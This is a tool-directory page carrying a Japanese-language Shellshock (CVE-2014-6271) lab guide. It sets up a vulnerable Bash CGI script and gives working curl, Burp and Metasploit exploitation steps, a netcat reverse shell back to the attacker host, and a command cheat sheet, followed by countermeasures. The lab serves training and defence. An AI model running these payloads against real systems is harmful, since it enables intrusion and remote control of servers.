Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-6271-Shellshock- — CVE-2014-6271(Shellshock)用の完全かつモダンなデモラボ。アーキテクチャ、悪用手順、Burp Suiteの使用方法、リバースシェル、対策、および完全なコマンドチートシートを含みます。 | Kitploit
ツール/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
脆弱性分析エクスプロイトリバースエンジニアリングウェブアプリケーション悪用CTFペネトレーションテストコマンド&コントロール学習と教育レッドチーミング
ペイロード開発
ラボと実践
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

CVE-2014-6271(Shellshock)用の完全かつモダンなデモラボ。アーキテクチャ、悪用手順、Burp Suiteの使用方法、リバースシェル、対策、および完全なコマンドチートシートを含みます。

リポジトリを見る
49ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Shellshock(CVE-2014-6271)の悪用:完全で現代的なデモンストレーションラボ

Shellshock(CVE-2014-6271)は、これまでに発見された中で最も影響力のあるリモートコード実行の脆弱性の1つです。この欠陥はBashに影響を及ぼし、攻撃者は環境変数に細工したペイロードを注入するだけで任意のコマンドを実行できます。

このガイドでは、以下を使用した完全で再現可能なデモンストレーションを提供します:

  • Kali Linux(攻撃者)
  • Metasploitable2(ターゲット)
  • curl、Burp Suite、Netcat
  • 手動で作成したBashベースのCGIスクリプト

これは、教育、研究、トレーニング、および一般的なサイバーセキュリティ意識向上のために設計されています。


📌 目次

  1. ラボ構成
  2. 脆弱なCGIスクリプトの作成
  3. Shellshockの脆弱性を理解する
  4. curlを使用したShellshockの悪用
  5. Burp Suiteを使用したShellshockの悪用
  6. Shellshock経由のリバースシェル
  7. 完全インタラクティブTTYへのアップグレード
  8. 攻撃チェーン図
  9. スクリーンショットギャラリー
  10. 対策
  11. チートシート(全コマンド)
  12. Metasploit(msfconsole)を使用したShellshockの悪用
  13. 結論

1. ラボ構成

コンポーネント役割OSIPアドレス主要サービス
Kali Linux攻撃者Kali Linux(最新版)192.168.1.4curl、Burp Suite、Netcat
Metasploitable2脆弱なターゲットサーバーUbuntu Linux(MSF2)192.168.1.5Apache 2.2、CGIスクリプト、Bash
Apache mod_cgiスクリプト実行MSF2上で動作n/aCGI経由でBashを公開
shellshock.sh脆弱なエントリーポイントBash CGIn/a環境変数を表示

このシンプルな2ノード構成は、産業システムやIoTシステムに今も存在する多くのレガシー環境を反映しています。


2. 脆弱なCGIスクリプトの作成

Metasploitable2上で:

root@kitploit:~
sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Kaliからスクリプトをテストします:

root@kitploit:~
curl http://192.168.1.5/cgi-bin/shellshock.sh

環境変数が表示されるはずです。


3. Shellshockの脆弱性を理解する

Shellshockは、Bashが関数定義に似た環境変数を誤って解析したときに発生します。

次のような悪意のある変数:

root@kitploit:~
() { :; }; /bin/bash -c "id"

関数自体は決して呼び出されないにもかかわらず、Bashに関数定義の後のコマンドを実行させます。

CGIアプリケーションは特に脆弱です。HTTPヘッダーが環境変数としてスクリプトに自動的に渡されるためです。


4. curlを使用したShellshockの悪用

root@kitploit:~
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

出力には次のものが含まれるはずです:

root@kitploit:~
Vulnerable
uid=33(www-data)

これはリモートコード実行を確認します。


5. Burp Suiteを使用したShellshockの悪用

5.1 通常のリクエストの送信

アクセス:

root@kitploit:~
http://192.168.1.5/cgi-bin/shellshock.sh

リクエストをRepeaterに送信します。

5.2 Shellshockペイロードの注入

User-Agentヘッダーを次のように置き換えます:

root@kitploit:~
User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 応答

次のように表示されるはずです:

root@kitploit:~
BurpTest
uid=33(www-data)

Burp Suiteを使用すると、視覚的かつ教育的に脆弱性を確認できます。


6. Shellshock経由のリバースシェル

Kaliでリスナーを起動:

root@kitploit:~
nc -lvnp 4444

CGIスクリプト経由でリバースシェルをトリガー:

root@kitploit:~
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

シェルがKaliに接続し返します。


7. 完全インタラクティブTTYへのアップグレード

リバースシェル内で:

root@kitploit:~
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

セッションを一時停止します:

root@kitploit:~
Ctrl + Z

Kali上で:

root@kitploit:~
stty raw -echo; fg

Enterキーを押します。

これで以下が利用可能になります:

  • タブ補完
  • 矢印キー
  • ジョブ制御
  • 完全なインタラクティブBash

8. 攻撃チェーン図

root@kitploit:~
          ┌────────────────────────┐
          │     Attacker (Kali)    │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. Malicious HTTP Header (Shellshock)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Apache Web Server (CGI)  │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. Header → CGI Environment Variable
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (Vulnerable)    │
      └───────────┬──────────────┘
                  │
      3. Injected Command Executes
                  │
                  ▼
        ┌─────────────────────────┐
        │  www-data Shell Access  │
        └───────────┬─────────────┘
                    │
        4. Reverse Shell → Kali
                    │
                    ▼
      ┌──────────────────────────┐
      │ Full Interactive TTY     │
      └──────────────────────────┘

9. スクリーンショットギャラリー

攻撃の主要段階を視覚的に解説するウォークスルーです。

説明画像
Nmapスキャン+Shellshockテストの出力
Burp Suite – 初期のShellshockリクエスト
Burp Suite – ペイロード/ヘッダー注入
Kali(nc)で受信したリバースシェル

10. 対策

✔ 1. Bashのアップグレード

関数解析を正しく処理するバージョンにパッチを適用します。

✔ 2. CGIの無効化

レガシーCGIは不要なシステム全体のリスクをもたらします。

✔ 3. HTTPヘッダーのサニタイズ

次のような不審なパターンを破棄します:

root@kitploit:~
() { :; };

✔ 4. 最小権限の原則

Webサーバーユーザー(www-data)の権限を制限します。

✔ 5. アウトバウンド接続の制限

リバースシェルとデータの外部流出を阻止します。

✔ 6. Webアプリケーションファイアウォール(WAF)の導入

最新のWAFシグネチャはShellshockを即座に検出します。

✔ 7. SELinux / AppArmorの有効化

Bashプロセスを隔離し、意図しない動作をブロックします。

✔ 8. 定期的な脆弱性スキャンの実施

次のようなツールを使用します:

  • Nessus
  • OpenVAS
  • Nikto
  • Nmap NSE(http-shellshock.nse)

11. チートシート(全コマンド)

ターゲットのセットアップ

root@kitploit:~
sudo su
cd /usr/lib/cgi-bin/
cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF
chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

CGIのテスト

root@kitploit:~
curl http://192.168.1.5/cgi-bin/shellshock.sh

Shellshockテスト

root@kitploit:~
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

リバースシェル

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

フルTTYへのアップグレード

シェル内:

root@kitploit:~
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

一時停止:

root@kitploit:~
Ctrl + Z

Kali上:

root@kitploit:~
stty raw -echo; fg

Enterキーを押します。


12. Metasploit(msfconsole)を使用したShellshockの悪用

Metasploitは、組み込みモジュールを使用してShellshockを悪用する、プロフェッショナルで自動化された方法を提供します:

root@kitploit:~
exploit/multi/http/apache_mod_cgi_bash_env_exec

この方法は高速で信頼性が高く、自動ペイロードステージング(例:Meterpreter)を提供します。


12.1 Metasploitの起動

root@kitploit:~
msfconsole

12.2 Shellshockモジュールの検索

root@kitploit:~
search shellshock

次のように表示されるはずです(他にもあります):

root@kitploit:~
exploit/multi/http/apache_mod_cgi_bash_env_exec  Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
auxiliary/scanner/http/apache_mod_cgi_bash_env   Apache mod_cgi Bash Environment Variable Injection (Scanner)

12.3 エクスプロイトモジュールの読み込み

root@kitploit:~
use exploit/multi/http/apache_mod_cgi_bash_env_exec

12.4 必要なオプションの設定

ターゲットIPを設定します:

root@kitploit:~
set rhosts 192.168.1.5

脆弱なCGIパスを設定します:

root@kitploit:~
set targeturi /cgi-bin/shellshock.sh

KaliのIPを設定します:

root@kitploit:~
set lhost 192.168.1.4

必要に応じてリスニングポートを設定します:

root@kitploit:~
set lport 4444

確認します:

root@kitploit:~
options

次のように表示されるはずです:

root@kitploit:~
RHOSTS     192.168.1.5
TARGETURI  /cgi-bin/shellshock.sh
LHOST      192.168.1.4
LPORT      4444
METHOD     GET
HEADER     User-Agent
CVE        CVE-2014-6271

12.5 エクスプロイトの起動

root@kitploit:~
run

成功すると:

root@kitploit:~
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Command Stager progress - 100.00%
[*] Sending stage ...
[*] Meterpreter session 1 opened ...

12.6 Meterpreterセッションとの対話

root@kitploit:~
sessions -i 1

これで以下が利用可能になります:

root@kitploit:~
meterpreter >

12.7 通常のシェルの起動

root@kitploit:~
shell

次に:

root@kitploit:~
id
hostname

期待される出力:

root@kitploit:~
uid=33(www-data) gid=33(www-data)
metasploitable

MetasploitとShellshockを使用してリモートコマンド実行を取得しました。


13. 結論

このデモンストレーションは、単純なHTTPヘッダー操作、リバースシェル、CGIスクリプト実行、およびMetasploitの自動化を使用してShellshockをどのように悪用できるかを示しています。10年以上前の脆弱性であるにもかかわらず、Shellshockは以下の重要な教訓を今なお提供しています:

  • 安全なソフトウェア開発の実践
  • 入力のサニタイズ
  • レガシーシステムのリスク
  • ポストエクスプロイテーション技術

たくさんの愛を込めて:
オマーンのHaitham ❤️🇴🇲

ツールをダウンロード